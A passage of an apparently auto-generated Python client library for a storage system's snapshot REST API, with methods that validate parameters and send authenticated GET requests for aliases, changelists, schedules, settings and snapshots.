'/platform/1/snapshot/aliases/{SnapshotAliasId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SnapshotAliases', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_snapshot_changelist(self, snapshot_changelist_id, **kwargs): # noqa: E501
"""get_snapshot_changelist # noqa: E501
Retrieve basic information on a changelist. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_changelist(snapshot_changelist_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_changelist_id: Retrieve basic information on a changelist. (required)
:param int limit: Return no more than this many results at once (see resume).
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:return: SnapshotChangelists
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_snapshot_changelist_with_http_info(snapshot_changelist_id, **kwargs) # noqa: E501
else:
(data) = self.get_snapshot_changelist_with_http_info(snapshot_changelist_id, **kwargs) # noqa: E501
return data
def get_snapshot_changelist_with_http_info(self, snapshot_changelist_id, **kwargs): # noqa: E501
"""get_snapshot_changelist # noqa: E501
Retrieve basic information on a changelist. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_changelist_with_http_info(snapshot_changelist_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_changelist_id: Retrieve basic information on a changelist. (required)
:param int limit: Return no more than this many results at once (see resume).
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:return: SnapshotChangelists
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['snapshot_changelist_id', 'limit', 'resume'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_snapshot_changelist" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'snapshot_changelist_id' is set
if ('snapshot_changelist_id' not in params or
params['snapshot_changelist_id'] is None):
raise ValueError("Missing the required parameter `snapshot_changelist_id` when calling `get_snapshot_changelist`") # noqa: E501
if 'limit' in params and params['limit'] > 4294967295: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `get_snapshot_changelist`, must be a value less than or equal to `4294967295`") # noqa: E501
if 'limit' in params and params['limit'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `get_snapshot_changelist`, must be a value greater than or equal to `1`") # noqa: E501
if ('resume' in params and
len(params['resume']) > 8192):
raise ValueError("Invalid value for parameter `resume` when calling `get_snapshot_changelist`, length must be less than or equal to `8192`") # noqa: E501
if ('resume' in params and
len(params['resume']) < 0):
raise ValueError("Invalid value for parameter `resume` when calling `get_snapshot_changelist`, length must be greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
if 'snapshot_changelist_id' in params:
path_params['SnapshotChangelistId'] = params['snapshot_changelist_id'] # noqa: E501
query_params = []
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'resume' in params:
query_params.append(('resume', params['resume'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/changelists/{SnapshotChangelistId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SnapshotChangelists', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_snapshot_license(self, **kwargs): # noqa: E501
"""get_snapshot_license # noqa: E501
Retrieve license information. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_license(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: LicenseLicense
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_snapshot_license_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_snapshot_license_with_http_info(**kwargs) # noqa: E501
return data
def get_snapshot_license_with_http_info(self, **kwargs): # noqa: E501
"""get_snapshot_license # noqa: E501
Retrieve license information. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_license_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: LicenseLicense
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_snapshot_license" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/5/snapshot/license', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LicenseLicense', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_snapshot_pending(self, **kwargs): # noqa: E501
"""get_snapshot_pending # noqa: E501
Return list of snapshots to be taken. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_pending(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int limit: Return no more than this many result at once (see resume).
:param int begin: Unix Epoch time to start generating matches. Default is now.
:param str schedule: Limit output only to the named schedule.
:param int end: Unix Epoch time to end generating matches. Default is forever.
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:return: SnapshotPending
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_snapshot_pending_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_snapshot_pending_with_http_info(**kwargs) # noqa: E501
return data
def get_snapshot_pending_with_http_info(self, **kwargs): # noqa: E501
"""get_snapshot_pending # noqa: E501
Return list of snapshots to be taken. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_pending_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int limit: Return no more than this many result at once (see resume).
:param int begin: Unix Epoch time to start generating matches. Default is now.
:param str schedule: Limit output only to the named schedule.
:param int end: Unix Epoch time to end generating matches. Default is forever.
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:return: SnapshotPending
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['limit', 'begin', 'schedule', 'end', 'resume'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_snapshot_pending" % key
)
params[key] = val
del params['kwargs']
if ('resume' in params and
len(params['resume']) > 8192):
raise ValueError("Invalid value for parameter `resume` when calling `get_snapshot_pending`, length must be less than or equal to `8192`") # noqa: E501
if ('resume' in params and
len(params['resume']) < 0):
raise ValueError("Invalid value for parameter `resume` when calling `get_snapshot_pending`, length must be greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'begin' in params:
query_params.append(('begin', params['begin'])) # noqa: E501
if 'schedule' in params:
query_params.append(('schedule', params['schedule'])) # noqa: E501
if 'end' in params:
query_params.append(('end', params['end'])) # noqa: E501
if 'resume' in params:
query_params.append(('resume', params['resume'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/pending', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SnapshotPending', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_snapshot_repstate(self, snapshot_repstate_id, **kwargs): # noqa: E501
"""get_snapshot_repstate # noqa: E501
Retrieve basic information on a repstate. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_repstate(snapshot_repstate_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_repstate_id: Retrieve basic information on a repstate. (required)
:param int limit: Return no more than this many results at once (see resume).
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:return: SnapshotRepstates
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_snapshot_repstate_with_http_info(snapshot_repstate_id, **kwargs) # noqa: E501
else:
(data) = self.get_snapshot_repstate_with_http_info(snapshot_repstate_id, **kwargs) # noqa: E501
return data
def get_snapshot_repstate_with_http_info(self, snapshot_repstate_id, **kwargs): # noqa: E501
"""get_snapshot_repstate # noqa: E501
Retrieve basic information on a repstate. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_repstate_with_http_info(snapshot_repstate_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_repstate_id: Retrieve basic information on a repstate. (required)
:param int limit: Return no more than this many results at once (see resume).
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:return: SnapshotRepstates
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['snapshot_repstate_id', 'limit', 'resume'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_snapshot_repstate" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'snapshot_repstate_id' is set
if ('snapshot_repstate_id' not in params or
params['snapshot_repstate_id'] is None):
raise ValueError("Missing the required parameter `snapshot_repstate_id` when calling `get_snapshot_repstate`") # noqa: E501
if 'limit' in params and params['limit'] > 4294967295: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `get_snapshot_repstate`, must be a value less than or equal to `4294967295`") # noqa: E501
if 'limit' in params and params['limit'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `get_snapshot_repstate`, must be a value greater than or equal to `1`") # noqa: E501
if ('resume' in params and
len(params['resume']) > 8192):
raise ValueError("Invalid value for parameter `resume` when calling `get_snapshot_repstate`, length must be less than or equal to `8192`") # noqa: E501
if ('resume' in params and
len(params['resume']) < 0):
raise ValueError("Invalid value for parameter `resume` when calling `get_snapshot_repstate`, length must be greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
if 'snapshot_repstate_id' in params:
path_params['SnapshotRepstateId'] = params['snapshot_repstate_id'] # noqa: E501
query_params = []
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'resume' in params:
query_params.append(('resume', params['resume'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/repstates/{SnapshotRepstateId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SnapshotRepstates', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_snapshot_schedule(self, snapshot_schedule_id, **kwargs): # noqa: E501
"""get_snapshot_schedule # noqa: E501
Retrieve the schedule. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_schedule(snapshot_schedule_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_schedule_id: Retrieve the schedule. (required)
:return: SnapshotSchedules
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_snapshot_schedule_with_http_info(snapshot_schedule_id, **kwargs) # noqa: E501
else:
(data) = self.get_snapshot_schedule_with_http_info(snapshot_schedule_id, **kwargs) # noqa: E501
return data
def get_snapshot_schedule_with_http_info(self, snapshot_schedule_id, **kwargs): # noqa: E501
"""get_snapshot_schedule # noqa: E501
Retrieve the schedule. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_schedule_with_http_info(snapshot_schedule_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_schedule_id: Retrieve the schedule. (required)
:return: SnapshotSchedules
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['snapshot_schedule_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_snapshot_schedule" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'snapshot_schedule_id' is set
if ('snapshot_schedule_id' not in params or
params['snapshot_schedule_id'] is None):
raise ValueError("Missing the required parameter `snapshot_schedule_id` when calling `get_snapshot_schedule`") # noqa: E501
collection_formats = {}
path_params = {}
if 'snapshot_schedule_id' in params:
path_params['SnapshotScheduleId'] = params['snapshot_schedule_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/snapshot/schedules/{SnapshotScheduleId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SnapshotSchedules', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_snapshot_settings(self, **kwargs): # noqa: E501
"""get_snapshot_settings # noqa: E501
List all settings # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_settings(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: SnapshotSettings
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_snapshot_settings_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_snapshot_settings_with_http_info(**kwargs) # noqa: E501
return data
    def get_snapshot_settings_with_http_info(self, **kwargs):  # noqa: E501
        """get_snapshot_settings  # noqa: E501

        List all settings  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.get_snapshot_settings_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :return: SnapshotSettings
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Keyword arguments this endpoint accepts (no endpoint-specific ones).
        all_params = []  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # NOTE: locals() is snapshotted here, before any further locals are
        # bound; validated kwargs are then folded into this dict so the
        # call_api() invocation below can read them via params.get(...).
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_snapshot_settings" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['basicAuth']  # noqa: E501

        # Dispatch the REST call through the shared API client.
        return self.api_client.call_api(
            '/platform/1/snapshot/settings', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='SnapshotSettings',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_snapshot_snapshot(self, snapshot_snapshot_id, **kwargs): # noqa: E501
"""get_snapshot_snapshot # noqa: E501
Retrieve snapshot information. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_snapshot(snapshot_snapshot_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_snapshot_id: Retrieve snapshot information. (required)
:return: SnapshotSnapshots
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_snapshot_snapshot_with_http_info(snapshot_snapshot_id, **kwargs) # noqa: E501
else:
(data) = self.get_snapshot_snapshot_with_http_info(snapshot_snapshot_id, **kwargs) # noqa: E501
return data
    def get_snapshot_snapshot_with_http_info(self, snapshot_snapshot_id, **kwargs):  # noqa: E501
        """get_snapshot_snapshot  # noqa: E501

        Retrieve snapshot information.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.get_snapshot_snapshot_with_http_info(snapshot_snapshot_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str snapshot_snapshot_id: Retrieve snapshot information. (required)
        :return: SnapshotSnapshots
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Accepted parameters for this endpoint.
        all_params = ['snapshot_snapshot_id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # NOTE: locals() is snapshotted here, before any further locals are
        # bound; validated kwargs are folded into this dict for call_api().
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_snapshot_snapshot" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'snapshot_snapshot_id' is set
        if ('snapshot_snapshot_id' not in params or
                params['snapshot_snapshot_id'] is None):
            raise ValueError("Missing the required parameter `snapshot_snapshot_id` when calling `get_snapshot_snapshot`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'snapshot_snapshot_id' in params:
            path_params['SnapshotSnapshotId'] = params['snapshot_snapshot_id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['basicAuth']  # noqa: E501

        # Dispatch the REST call through the shared API client.
        return self.api_client.call_api(
            '/platform/1/snapshot/snapshots/{SnapshotSnapshotId}', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='SnapshotSnapshots',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_snapshot_snapshots_summary(self, **kwargs): # noqa: E501
"""get_snapshot_snapshots_summary # noqa: E501
Return summary information about snapshots. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_snapshots_summary(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: SnapshotSnapshotsSummary
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_snapshot_snapshots_summary_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_snapshot_snapshots_summary_with_http_info(**kwargs) # noqa: E501
return data
    def get_snapshot_snapshots_summary_with_http_info(self, **kwargs):  # noqa: E501
        """get_snapshot_snapshots_summary  # noqa: E501

        Return summary information about snapshots.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.get_snapshot_snapshots_summary_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :return: SnapshotSnapshotsSummary
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Accepted parameters for this endpoint (no endpoint-specific ones).
        all_params = []  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # NOTE: locals() is snapshotted here, before any further locals are
        # bound; validated kwargs are folded into this dict for call_api().
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_snapshot_snapshots_summary" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['basicAuth']  # noqa: E501

        # Dispatch the REST call through the shared API client.
        return self.api_client.call_api(
            '/platform/1/snapshot/snapshots-summary', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='SnapshotSnapshotsSummary',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def list_snapshot_aliases(self, **kwargs): # noqa: E501
"""list_snapshot_aliases # noqa: E501
List all or matching snapshot aliases. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_snapshot_aliases(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort: The field that will be used for sorting. Choices are id, name, snapshot, and created. Default is id.
:param int limit: Return no more than this many results at once (see resume).
:param str dir: The direction of the sort.
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:return: SnapshotAliasesExtended
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_snapshot_aliases_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_snapshot_aliases_with_http_info(**kwargs) # noqa: E501
return data
    def list_snapshot_aliases_with_http_info(self, **kwargs):  # noqa: E501
        """list_snapshot_aliases  # noqa: E501

        List all or matching snapshot aliases.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.list_snapshot_aliases_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str sort: The field that will be used for sorting. Choices are id, name, snapshot, and created. Default is id.
        :param int limit: Return no more than this many results at once (see resume).
        :param str dir: The direction of the sort.
        :param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
        :return: SnapshotAliasesExtended
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Accepted query parameters for this endpoint.
        all_params = ['sort', 'limit', 'dir', 'resume']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # NOTE: locals() is snapshotted here, before any further locals are
        # bound; validated kwargs are folded into this dict for call_api().
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method list_snapshot_aliases" % key
                )
            params[key] = val
        del params['kwargs']

        # Range/length validation emitted from the API schema.  The
        # `len(...) < 0` checks can never fire (len is non-negative);
        # they are kept verbatim as generated.
        if 'limit' in params and params['limit'] > 4294967295:  # noqa: E501
            raise ValueError("Invalid value for parameter `limit` when calling `list_snapshot_aliases`, must be a value less than or equal to `4294967295`")  # noqa: E501
        if 'limit' in params and params['limit'] < 1:  # noqa: E501
            raise ValueError("Invalid value for parameter `limit` when calling `list_snapshot_aliases`, must be a value greater than or equal to `1`")  # noqa: E501
        if ('dir' in params and
                len(params['dir']) < 0):
            raise ValueError("Invalid value for parameter `dir` when calling `list_snapshot_aliases`, length must be greater than or equal to `0`")  # noqa: E501
        if ('resume' in params and
                len(params['resume']) > 8192):
            raise ValueError("Invalid value for parameter `resume` when calling `list_snapshot_aliases`, length must be less than or equal to `8192`")  # noqa: E501
        if ('resume' in params and
                len(params['resume']) < 0):
            raise ValueError("Invalid value for parameter `resume` when calling `list_snapshot_aliases`, length must be greater than or equal to `0`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []
        if 'sort' in params:
            query_params.append(('sort', params['sort']))  # noqa: E501
        if 'limit' in params:
            query_params.append(('limit', params['limit']))  # noqa: E501
        if 'dir' in params:
            query_params.append(('dir', params['dir']))  # noqa: E501
        if 'resume' in params:
            query_params.append(('resume', params['resume']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['basicAuth']  # noqa: E501

        # Dispatch the REST call through the shared API client.
        return self.api_client.call_api(
            '/platform/1/snapshot/aliases', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='SnapshotAliasesExtended',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def list_snapshot_changelists(self, **kwargs): # noqa: E501
"""list_snapshot_changelists # noqa: E501
List all changelists. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_snapshot_changelists(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int limit: Return no more than this many results at once (see resume).
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:return: SnapshotChangelistsExtended
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_snapshot_changelists_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_snapshot_changelists_with_http_info(**kwargs) # noqa: E501
return data
    def list_snapshot_changelists_with_http_info(self, **kwargs):  # noqa: E501
        """list_snapshot_changelists  # noqa: E501

        List all changelists.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.list_snapshot_changelists_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param int limit: Return no more than this many results at once (see resume).
        :param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
        :return: SnapshotChangelistsExtended
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Accepted query parameters for this endpoint.
